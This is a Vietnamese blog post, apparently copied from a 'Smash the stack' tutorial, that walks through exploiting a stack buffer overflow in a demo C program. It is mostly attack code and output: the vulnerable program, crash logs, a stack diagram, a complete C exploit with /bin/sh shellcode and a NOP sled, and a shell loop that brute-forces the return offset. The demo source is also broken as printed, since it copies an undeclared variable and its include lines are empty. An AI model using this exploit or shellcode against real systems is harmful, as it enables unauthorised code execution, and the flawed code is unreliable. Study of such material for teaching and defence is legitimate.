Trao đổi với tôi

www.hdphim.info

1/4/10

[Hacking] "Smash the stack" - Hướng dẫn khai thác buffer overflow

Chúng ta có một chương trình bị lỗi tràn bộ đệm :

Mã:
/* Vuln.c to demonstration buffer overflow
*/
#include
#include
#include

int main()
{
char buffer[512];
char *buff;
if(getenv("EGG") == 0)
{
printf("No environment found!\n");
printf("Aborting!\n");
exit(0);
}

buff = getenv("EGG");
strcpy(buffer, buf2);
printf("Using environemtn: %s\n", buff);
return 0;
}
Trích dẫn:
bt buffer_overflow # ./vuln

No environment found!
Aborting!
Mã:
bt buffer_overflow # export EGG="1234567890"


bt buffer_overflow # ./vuln

Using enviromental string: 1234567890
Mã:
bt buffer_overflow # export EGG=`perl -e 'print "A"x628'`



bt buffer_overflow # ./vuln

Using enviromental string: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault
Mã:
bt buffer_overflow # ulimit -c unlimited
Mã:
bt buffer_overflow # ./vuln

Using enviromental string: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)


[################################][EBP][EIP][######]

Sau khi làm tràn :


[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA][AAAA][AAAA][AAAAAAA]



Mục tiêu của chúng ta :

[NNNNNNNSSSSSSSSSSSSSSRRRRRRRRRRR][R][R][RRRRRRR]



N: Nop
S: shellcode
R: return address .

Mã:
#include 
#include
#define OFFSET 0
#define BUFFER_SIZE 628
#define NOP 0x90
unsigned long esp(void)
{
__asm__("movl %esp,%eax");
}
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh"
;


void main(int argc,char * argv[])
{
char *buffer;
char *buffer_ptr;
long *addr_ret_ptr;
long addr;
int size_buf = BUFFER_SIZE;
int offset = OFFSET;
if(
argc > 1) { size_buf = atoi(argv[1]); }
if(
argc > 2) { offset = atoi(argv[2]); }
if(!(
buffer = malloc(size_buf)))
{
printf("Unable to allocate memory.\n");
exit(
0);
}

addr = esp() - offset;
buffer_ptr = buffer;
addr_ret_ptr = (long *) buffer_ptr;
int i ;
for(
i = 0; i < size_buf; i+=4) { *(addr_ret_ptr++) = addr; }
for(
i = 0; i < size_buf / 2; i++) { buffer[i] = NOP; }
buffer_ptr = buffer + ((size_buf/2) - (strlen(shellcode)/2));
for(
i = 0; i < strlen(shellcode); i++) { *(buffer_ptr++) =shellcode[i]; }
buffer[size_buf - 1] = '\0';
memcpy(buffer, "EGG=", 4);
putenv(buffer);
system("./vuln");
return
0;



}













Mã:
#!/bin/sh
OFFSET=1
while test $OFFSET -lt 10000
do
./expl 628 $OFFSET
OFFSET=`expr $OFFSET + 1`
done
tut by Suto@vnsecurity.net leecher : fckD3r

No comments:

Post a Comment